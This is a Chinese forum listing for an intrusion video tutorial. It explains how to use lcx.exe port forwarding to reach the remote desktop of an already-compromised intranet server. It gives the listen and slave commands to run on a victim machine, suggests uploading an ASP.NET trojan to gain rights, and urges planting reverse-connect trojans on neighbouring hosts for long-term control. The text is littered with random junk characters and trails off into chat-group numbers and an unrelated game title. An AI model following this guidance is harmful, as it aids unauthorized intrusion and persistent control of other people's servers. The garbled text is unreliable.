软件简介:
* n- @7 E9 C; d' O(注意:这是语音教程,请打开您的音响,并且使用1024*768的屏幕分辨率来观看本教程!); o: j) p1 O- a; b* _# b
教程名称:端口映射内网提权教程/ @7 f, q- I1 C1 s
主讲:低调小飞( }! c0 Q$ @2 Z/ `* u1 U9 j
说明:
" i0 G4 D" |4 j7 O1 V 6 N8 g$ ?# @/ C( o9 ^ O
当我们成功入侵一个网站并拿到WEBSHELL,开放了对方的3389或是已经得到了对方SQL server 的SA用户密码时却发现该服务器处在一个内网! @* n7 ~* ~% N* \* w& `
中环境,如:192.168.1.107 这样我们直接利用工具是无法成功连接的。那么我们就可以通过LCX端口转发来连接外网,再通过连接本机IP来连 }, _/ P5 M# f% D! z$ r
接对方服务器。
) ~9 y- W4 P/ ^LCX使用方法:% t3 g( G7 h F0 u$ F
首先在自己机子的cmd下运行 ?* f2 G. L; `/ L. J- \+ G& H
lcx.exe -listen 110 338919 f7 Z1 H- F+ X8 H% w' f
意思是监听110端口并转发到33891端口
8 g/ x9 E' V6 H' j6 B+ r然后在肉鸡上运行 lcx.exe -slave 你的IP 110 肉机IP 3389" h5 L' U# N0 e; R; H
意思是 把肉机的3389端口 转发到 自己的IP 110端口上
5 e% m. ]% H1 J$ ]" J) b B9 O) N( m6 v$ D6 h
问题分析:如果在入侵时ASP的控制权限过小,我们可以上传ASP.NET木马来扩大权限。再来做端口映射!
" B! ^- G u! U ]/ {0 K
r# ^4 c% x0 p& O7 p思路扩展:通过其他的手段,控制同网段其他机器,并对计算机安装反弹木马,这样来达到长期控制对方服务器!
- ~& v+ B3 a7 M6 a8 }=============================7 P, p \, J" R1 F" \1 r
41259640低調小飛技術交流群㈡
) A: @5 ?# ^( ^7 `+ S- ?4 N1 u41209575低調小飛技術交流群㈢
9 d% B& ]4 K2 G- k0 r, S41209451低調小飛技術交流群㈣/ \, q* C6 y' P' D$ v
22387823低調小飛技術交流群㈤1 e8 j# F6 ?! v U, w* _9 r0 L
16599303低調小飛技術交流群㈥# h2 H; h& \6 ^' s& m+ H
16639680低調小飛技術交流群㈦
) G' N. G! N3 F5 G" V41209297低調小飛技術交流群㈧
' M9 }0 w( V' X" a* G# a0 x) s下载地址:
|
最新大话西游3单机完全版
